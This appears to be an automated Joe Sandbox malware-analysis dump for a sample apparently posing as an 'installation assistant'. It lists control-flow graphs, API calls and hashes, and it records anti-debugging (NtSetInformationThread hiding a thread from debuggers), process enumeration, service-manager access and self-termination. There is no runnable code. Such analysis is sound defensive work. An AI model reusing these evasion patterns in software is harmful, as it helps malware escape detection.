100905->100861 100906->100863 100907->100865 100908 6ca93d62 100909 6ca93bc0 100908->100909 100910 6ca93e8a GetCurrentThread NtSetInformationThread 100909->100910 100911 6ca93eea 100910->100911 100912 6caa4a27 100916 6caa4a5d _strlen 100912->100916 100913 6cab639e 101003 6cc20130 18 API calls 2 library calls 100913->101003 100914 6caa5b58 100917 6cc16a43 std::_Facet_Register 4 API calls 100914->100917 100915 6caa5b6f 100918 6cc16a43 std::_Facet_Register 4 API calls 100915->100918 100916->100913 100916->100914 100916->100915 100920 6caa5b09 _Yarn 100916->100920 100917->100920 100918->100920 100921 6cc0aec0 FindFirstFileA 100920->100921 100923 6caa5bad std::ios_base::_Ios_base_dtor 100921->100923 100922 6cc14ff0 4 API calls 100928 6caa61cb _strlen 100922->100928 100923->100913 100923->100922 100926 6caa9ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100923->100926 100924 6cc16a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100924->100926 100925 6cc0aec0 FindFirstFileA 100925->100926 100926->100913 100926->100924 100926->100925 100927 6caaa292 Sleep 100926->100927 100947 6caae619 100926->100947 100945 6caa9bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 100927->100945 100928->100913 100929 6caa660d 100928->100929 100930 6caa6624 100928->100930 100936 6caa65bc _Yarn _strlen 100928->100936 100931 6cc16a43 std::_Facet_Register 4 API calls 100929->100931 100932 6cc16a43 std::_Facet_Register 4 API calls 100930->100932 100931->100936 100932->100936 100933 6cc14ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 100933->100945 100934 6caa9bbd GetCurrentProcess TerminateProcess 100934->100926 100935 6cab63b2 101004 6ca915e0 18 API calls std::ios_base::_Ios_base_dtor 100935->101004 100936->100935 100939 6caa6989 100936->100939 100940 6caa6970 100936->100940 100943 6caa6920 _Yarn 100936->100943 100938 6cab64f8 100942 6cc16a43 std::_Facet_Register 4 API calls 100939->100942 100941 6cc16a43 
std::_Facet_Register 4 API calls 100940->100941 100941->100943 100942->100943 100944 6cc15960 104 API calls 100943->100944 100948 6caa69d6 std::ios_base::_Ios_base_dtor _strlen 100944->100948 100945->100913 100945->100926 100945->100933 100945->100934 100945->100935 100954 6cc15960 104 API calls 100945->100954 100964 6cc16a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100945->100964 100946 6caaf243 CreateFileA 100955 6caaf2a7 100946->100955 100947->100946 100948->100913 100949 6caa6dbb 100948->100949 100950 6caa6dd2 100948->100950 100956 6caa6d69 _Yarn _strlen 100948->100956 100953 6cc16a43 std::_Facet_Register 4 API calls 100949->100953 100951 6cc16a43 std::_Facet_Register 4 API calls 100950->100951 100951->100956 100952 6cab02ca 100953->100956 100954->100945 100955->100952 100963 6cab02ac GetCurrentProcess TerminateProcess 100955->100963 100956->100935 100957 6caa7440 100956->100957 100958 6caa7427 100956->100958 100959 6caa73da _Yarn 100956->100959 100961 6cc16a43 std::_Facet_Register 4 API calls 100957->100961 100960 6cc16a43 std::_Facet_Register 4 API calls 100958->100960 100962 6cc15960 104 API calls 100959->100962 100960->100959 100961->100959 100965 6caa748d std::ios_base::_Ios_base_dtor _strlen 100962->100965 100963->100952 100964->100945 100965->100913 100966 6caa79a8 100965->100966 100967 6caa7991 100965->100967 100970 6caa7940 _Yarn _strlen 100965->100970 100969 6cc16a43 std::_Facet_Register 4 API calls 100966->100969 100968 6cc16a43 std::_Facet_Register 4 API calls 100967->100968 100968->100970 100969->100970 100970->100935 100971 6caa7dc9 100970->100971 100972 6caa7de2 100970->100972 100975 6caa7d7c _Yarn 100970->100975 100973 6cc16a43 std::_Facet_Register 4 API calls 100971->100973 100974 6cc16a43 std::_Facet_Register 4 API calls 100972->100974 100973->100975 100974->100975 100976 6cc15960 104 API calls 100975->100976 100977 6caa7e2f std::ios_base::_Ios_base_dtor _strlen 100976->100977 
100977->100913 100978 6caa85a8 100977->100978 100979 6caa85bf 100977->100979 100982 6caa8556 _Yarn _strlen 100977->100982 100980 6cc16a43 std::_Facet_Register 4 API calls 100978->100980 100981 6cc16a43 std::_Facet_Register 4 API calls 100979->100981 100980->100982 100981->100982 100982->100935 100983 6caa896a 100982->100983 100984 6caa8983 100982->100984 100987 6caa891d _Yarn 100982->100987 100985 6cc16a43 std::_Facet_Register 4 API calls 100983->100985 100986 6cc16a43 std::_Facet_Register 4 API calls 100984->100986 100985->100987 100986->100987 100988 6cc15960 104 API calls 100987->100988 100991 6caa89d0 std::ios_base::_Ios_base_dtor _strlen 100988->100991 100989 6caa8f1f 100992 6cc16a43 std::_Facet_Register 4 API calls 100989->100992 100990 6caa8f36 100993 6cc16a43 std::_Facet_Register 4 API calls 100990->100993 100991->100913 100991->100989 100991->100990 100996 6caa8ecd _Yarn _strlen 100991->100996 100992->100996 100993->100996 100994 6caa936d 100998 6cc16a43 std::_Facet_Register 4 API calls 100994->100998 100995 6caa9354 100997 6cc16a43 std::_Facet_Register 4 API calls 100995->100997 100996->100935 100996->100994 100996->100995 100999 6caa9307 _Yarn 100996->100999 100997->100999 100998->100999 101000 6cc15960 104 API calls 100999->101000 101002 6caa93ba std::ios_base::_Ios_base_dtor 101000->101002 101001 6cc14ff0 4 API calls 101001->100926 101002->100913 101002->101001 101004->100938 101005 6cc1ef3f 101006 6cc1ef4b __wsopen_s 101005->101006 101007 6cc1ef52 GetLastError ExitThread 101006->101007 101008 6cc1ef5f 101006->101008 101009 6cc249b2 __Getctype 37 API calls 101008->101009 101010 6cc1ef64 101009->101010 101017 6cc29d66 101010->101017 101014 6cc1ef7b 101023 6cc1eeaa 16 API calls 2 library calls 101014->101023 101016 6cc1ef9d 101018 6cc1ef6f 101017->101018 101019 6cc29d78 GetPEB 101017->101019 101018->101014 101022 6cc26d6f 5 API calls std::_Lockit::_Lockit 101018->101022 101019->101018 101020 6cc29d8b 101019->101020 101024 6cc26e18 5 API calls 
std::_Lockit::_Lockit 101020->101024 101022->101014 101023->101016 101024->101018
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID: HR^
                                                            • API String ID: 4218353326-1341859651
                                                            • Opcode ID: 25eaa381f26aae009ba2fc5efd566f687f153ea2f198c137569a5d7afc48331f
                                                            • Instruction ID: e9a74d6918727f85d58499c00c903ee314091fb2bd944947a64731d8cc189a56
                                                            • Opcode Fuzzy Hash: 25eaa381f26aae009ba2fc5efd566f687f153ea2f198c137569a5d7afc48331f
                                                            • Instruction Fuzzy Hash: 0B740571655B018FC728CF28C8D1695B7F3EF85318B1D8A2DC0AA8BB55E774B58ACB40
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: }jk$;T55$L@^
                                                            • API String ID: 0-4218709813
                                                            • Opcode ID: 974937c35170c0113945411930b502a0a33d86d1832e229d9e10fef827ac2324
                                                            • Instruction ID: f6b2ccc76dfe8444bfe3cc3171289f6a663da5e66d3eaa280233f3bedcb88ca5
                                                            • Opcode Fuzzy Hash: 974937c35170c0113945411930b502a0a33d86d1832e229d9e10fef827ac2324
                                                            • Instruction Fuzzy Hash: AB34F671645B018FC728CF68C8D0696B7E3AF85318B1D8A6DC0968BB55EB35B58BCB40

                                                            Control-flow Graph

                                                            control_flow_graph 7677 6cc15240-6cc15275 CreateToolhelp32Snapshot 7678 6cc152a0-6cc152a9 7677->7678 7679 6cc152e0-6cc152e5 7678->7679 7680 6cc152ab-6cc152b0 7678->7680 7683 6cc15377-6cc153a1 call 6cc22c05 7679->7683 7684 6cc152eb-6cc152f0 7679->7684 7681 6cc152b2-6cc152b7 7680->7681 7682 6cc15315-6cc1531a 7680->7682 7688 6cc15334-6cc1535d call 6cc1b920 Process32FirstW 7681->7688 7689 6cc152b9-6cc152be 7681->7689 7685 6cc15320-6cc15332 Process32NextW 7682->7685 7686 6cc153a6-6cc153ab 7682->7686 7683->7678 7690 6cc152f2-6cc152f7 7684->7690 7691 6cc15277-6cc15292 CloseHandle 7684->7691 7692 6cc15362-6cc15372 7685->7692 7686->7678 7695 6cc153b1-6cc153bf 7686->7695 7688->7692 7689->7678 7696 6cc152c0-6cc152d1 7689->7696 7690->7678 7697 6cc152f9-6cc15313 7690->7697 7691->7678 7692->7678 7696->7678 7697->7678
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CC1524E
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: CreateSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 3332741929-0
                                                            • Opcode ID: 87dd846ea281e53c4bd3c7f10c6b19193fe7de05d289af9dcc99257caddd3ac2
                                                            • Instruction ID: 7b23c44767fda4a64f5c0384d60757012248f4b1bd28d1d66052553f35ff7d22
                                                            • Opcode Fuzzy Hash: 87dd846ea281e53c4bd3c7f10c6b19193fe7de05d289af9dcc99257caddd3ac2
                                                            • Instruction Fuzzy Hash: DE319E7960C3409FD7109F2AC888B0ABBF4BF95348F91492DE588C7B60E375D8499B52

                                                            Control-flow Graph

                                                            control_flow_graph 7821 6ca93886-6ca9388e 7822 6ca93970-6ca9397d 7821->7822 7823 6ca93894-6ca93896 7821->7823 7825 6ca9397f-6ca93989 7822->7825 7826 6ca939f1-6ca939f8 7822->7826 7823->7822 7824 6ca9389c-6ca938b9 7823->7824 7827 6ca938c0-6ca938c1 7824->7827 7825->7824 7828 6ca9398f-6ca93994 7825->7828 7829 6ca939fe-6ca93a03 7826->7829 7830 6ca93ab5-6ca93aba 7826->7830 7831 6ca9395e 7827->7831 7833 6ca9399a-6ca9399f 7828->7833 7834 6ca93b16-6ca93b18 7828->7834 7835 6ca93a09-6ca93a2f 7829->7835 7836 6ca938d2-6ca938d4 7829->7836 7830->7824 7832 6ca93ac0-6ca93ac7 7830->7832 7840 6ca93960-6ca93964 7831->7840 7832->7827 7841 6ca93acd-6ca93ad6 7832->7841 7842 6ca9383b-6ca93855 call 6cbe1470 call 6cbe1480 7833->7842 7843 6ca939a5-6ca939bf 7833->7843 7834->7827 7837 6ca938f8-6ca93955 7835->7837 7838 6ca93a35-6ca93a3a 7835->7838 7839 6ca93957-6ca9395c 7836->7839 7837->7839 7844 6ca93b1d-6ca93b22 7838->7844 7845 6ca93a40-6ca93a57 7838->7845 7839->7831 7847 6ca9396a 7840->7847 7848 6ca93860-6ca93885 7840->7848 7841->7834 7849 6ca93ad8-6ca93aeb 7841->7849 7842->7848 7850 6ca93a5a-6ca93a5d 7843->7850 7856 6ca93b49-6ca93b50 7844->7856 7857 6ca93b24-6ca93b44 7844->7857 7845->7850 7853 6ca93ba1-6ca93bb6 7847->7853 7848->7821 7849->7837 7854 6ca93af1-6ca93af8 7849->7854 7851 6ca93aa9-6ca93ab0 7850->7851 7851->7840 7858 6ca93bc0-6ca93bda call 6cbe1470 call 6cbe1480 7853->7858 7860 6ca93afa-6ca93aff 7854->7860 7861 6ca93b62-6ca93b85 7854->7861 7856->7827 7864 6ca93b56-6ca93b5d 7856->7864 7857->7851 7872 6ca93be0-6ca93bfe 7858->7872 7860->7839 7861->7837 7865 6ca93b8b 7861->7865 7864->7840 7865->7853 7875 6ca93e7b 7872->7875 7876 6ca93c04-6ca93c11 7872->7876 7877 6ca93e81-6ca93ee0 call 6ca93750 GetCurrentThread NtSetInformationThread 7875->7877 7878 6ca93ce0-6ca93cea 7876->7878 7879 6ca93c17-6ca93c20 7876->7879 7894 6ca93eea-6ca93f04 call 6cbe1470 call 6cbe1480 7877->7894 7881 6ca93d3a-6ca93d3c 7878->7881 7882 6ca93cec-6ca93d0c 
7878->7882 7883 6ca93dc5 7879->7883 7884 6ca93c26-6ca93c2d 7879->7884 7887 6ca93d3e-6ca93d45 7881->7887 7888 6ca93d70-6ca93d8d 7881->7888 7886 6ca93d90-6ca93d95 7882->7886 7889 6ca93dc6 7883->7889 7890 6ca93dc3 7884->7890 7891 6ca93c33-6ca93c3a 7884->7891 7896 6ca93dba-6ca93dc1 7886->7896 7897 6ca93d97-6ca93db8 7886->7897 7895 6ca93d50-6ca93d57 7887->7895 7888->7886 7898 6ca93dc8-6ca93dcc 7889->7898 7890->7883 7892 6ca93c40-6ca93c5b 7891->7892 7893 6ca93e26-6ca93e2b 7891->7893 7899 6ca93e1b-6ca93e24 7892->7899 7900 6ca93c7b-6ca93cd0 7893->7900 7901 6ca93e31 7893->7901 7915 6ca93f75-6ca93fa1 7894->7915 7895->7889 7896->7890 7903 6ca93dd7-6ca93ddc 7896->7903 7897->7883 7898->7872 7904 6ca93dd2 7898->7904 7899->7898 7905 6ca93e76-6ca93e79 7899->7905 7900->7895 7901->7858 7907 6ca93dde-6ca93e17 7903->7907 7908 6ca93e36-6ca93e3d 7903->7908 7904->7905 7905->7877 7907->7899 7909 6ca93e5c-6ca93e5f 7908->7909 7910 6ca93e3f-6ca93e5a 7908->7910 7909->7900 7913 6ca93e65-6ca93e69 7909->7913 7910->7899 7913->7898 7913->7905 7919 6ca94020-6ca94026 7915->7919 7920 6ca93fa3-6ca93fa8 7915->7920 7921 6ca9402c-6ca9403c 7919->7921 7922 6ca93f06-6ca93f35 7919->7922 7923 6ca9407c-6ca94081 7920->7923 7924 6ca93fae-6ca93fcf 7920->7924 7928 6ca9403e-6ca94058 7921->7928 7929 6ca940b3-6ca940b8 7921->7929 7927 6ca93f38-6ca93f61 7922->7927 7925 6ca940aa-6ca940ae 7923->7925 7926 6ca94083-6ca9408a 7923->7926 7924->7925 7930 6ca93f6b-6ca93f6f 7925->7930 7926->7927 7931 6ca94090 7926->7931 7933 6ca93f64-6ca93f67 7927->7933 7934 6ca9405a-6ca94063 7928->7934 7929->7924 7932 6ca940be-6ca940c9 7929->7932 7930->7915 7931->7894 7935 6ca940a7 7931->7935 7932->7925 7936 6ca940cb-6ca940d4 7932->7936 7937 6ca93f69 7933->7937 7938 6ca94069-6ca9406c 7934->7938 7939 6ca940f5-6ca9413f 7934->7939 7935->7925 7936->7935 7940 6ca940d6-6ca940f0 7936->7940 7937->7930 7942 6ca94072-6ca94077 7938->7942 7943 6ca94144-6ca9414b 7938->7943 7939->7937 7940->7934 7942->7933 7943->7930
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 820f56e8938da3f3ac0e53fbacb361879d1652e9afac8cbf102f8becc66ab1a3
                                                            • Instruction ID: b9f125fe55e91e2499b850c355f5eb2b62f3487380fed021e7b8c1515e413016
                                                            • Opcode Fuzzy Hash: 820f56e8938da3f3ac0e53fbacb361879d1652e9afac8cbf102f8becc66ab1a3
                                                            • Instruction Fuzzy Hash: DE32D232256B018FC324CF28C8D1695B7F3EF9131876D8A6DC0EA4BA95D775B48ACB50

                                                            Control-flow Graph

                                                            Control-flow graph (rendered as an image; edge data omitted). Basic blocks 6ca9383b-6ca9414b; block 6ca93e81-6ca93ee0 calls 6ca93750, GetCurrentThread and NtSetInformationThread.
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: CurrentThread
                                                            • String ID:
                                                            • API String ID: 2882836952-0
                                                            • Opcode ID: 7ba203476026fe971f93f4ab3b6268cf8f99a597c97fda17beea317211b56d9c
                                                            • Instruction ID: 5bcace41b7c5d9cc2d0fd00acb33f5eef684f4d4717d3ce42b3662c239e51ebb
                                                            • Opcode Fuzzy Hash: 7ba203476026fe971f93f4ab3b6268cf8f99a597c97fda17beea317211b56d9c
                                                            • Instruction Fuzzy Hash: 9F5104311267018FC320CF29C481795B7F3BF95314F698B1DC0EA5BA95DB74B48A8B51
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: CurrentThread
                                                            • String ID:
                                                            • API String ID: 2882836952-0
                                                            • Opcode ID: 1177bd0b3d5750a7de1d6cf7eee82036ad09b0d576eb641d7622917a7aad2bae
                                                            • Instruction ID: 04f8e76d15aee0e3767af1142682464b8aab5bb646ba701c5cf3b2842706bab6
                                                            • Opcode Fuzzy Hash: 1177bd0b3d5750a7de1d6cf7eee82036ad09b0d576eb641d7622917a7aad2bae
                                                            • Instruction Fuzzy Hash: 6751E531125B018FC720CF29C481795B7F3BF85318F698B1DC0EA5BA95DB75B48A8B51
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 6CA93E9D
                                                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CA93EAA
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: Thread$CurrentInformation
                                                            • String ID:
                                                            • API String ID: 1650627709-0
                                                            • Opcode ID: b6a929b0a24459af381ec57ba807734be332eb743cda199037999248aae8ba38
                                                            • Instruction ID: 9617b09aa41c99d2de4985551072c5de1d476b2af73bd2ed06a3a0df110532fe
                                                            • Opcode Fuzzy Hash: b6a929b0a24459af381ec57ba807734be332eb743cda199037999248aae8ba38
                                                            • Instruction Fuzzy Hash: D0312431226B018FD720CF28C8957C6B7F3AF96318F294E1DC0EA5BA91DB7474898B51
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 6CA93E9D
                                                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CA93EAA
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: Thread$CurrentInformation
                                                            • String ID:
                                                            • API String ID: 1650627709-0
                                                            • Opcode ID: 17ffa31ce84b43e4d87a7ca5b1430dfdfe3a8a2aae5ace916bc256508a04e3fe
                                                            • Instruction ID: 9b9eb8503f0123be689e7cfba2d65978a6967e01fc17ef006215064a18cdc1e3
                                                            • Opcode Fuzzy Hash: 17ffa31ce84b43e4d87a7ca5b1430dfdfe3a8a2aae5ace916bc256508a04e3fe
                                                            • Instruction Fuzzy Hash: 0C312131125B018BD720CF28C492796B7F6AF86308F294E1DC0EA4BA95DB717489CB91
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 6CA93E9D
                                                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6CA93EAA
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: Thread$CurrentInformation
                                                            • String ID:
                                                            • API String ID: 1650627709-0
                                                            • Opcode ID: 9181bf26d263ad32055439d6fbfa81346c36c232d5ffe48ab4e5fc421d43d794
                                                            • Instruction ID: 825a1f1696afe94bce4ee401432f87597bd80e77d24c85ff093252ea79b1a56e
                                                            • Opcode Fuzzy Hash: 9181bf26d263ad32055439d6fbfa81346c36c232d5ffe48ab4e5fc421d43d794
                                                            • Instruction Fuzzy Hash: 5E2108312297018BD724CF24C89279A77F6AF46308F284E1DC0FB8BA95DB7574858B51
                                                            APIs
                                                            • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CC15130
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: ManagerOpen
                                                            • String ID:
                                                            • API String ID: 1889721586-0
                                                            • Opcode ID: 05a1ac7d8d3a300c4d0ff21ea434b40bf1affd9e92bbe205c912d8cae56f208a
                                                            • Instruction ID: 8e2837602185aa791f0e52c9dc977414cc13ad2b09535d6a091771458fcceb2a
                                                            • Opcode Fuzzy Hash: 05a1ac7d8d3a300c4d0ff21ea434b40bf1affd9e92bbe205c912d8cae56f208a
                                                            • Instruction Fuzzy Hash: EE3149B460C301EFC7118F2AC545A4ABBF0FB89768F60895AF988C6760D331C845AB52
                                                            APIs
                                                            • FindFirstFileA.KERNEL32(?,?), ref: 6CC0AEDC
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: FileFindFirst
                                                            • String ID:
                                                            • API String ID: 1974802433-0
                                                            • Opcode ID: 67b48f57c7f4b646e4a9ee22ae6830ead9206950cdb4320f1b426858709619c3
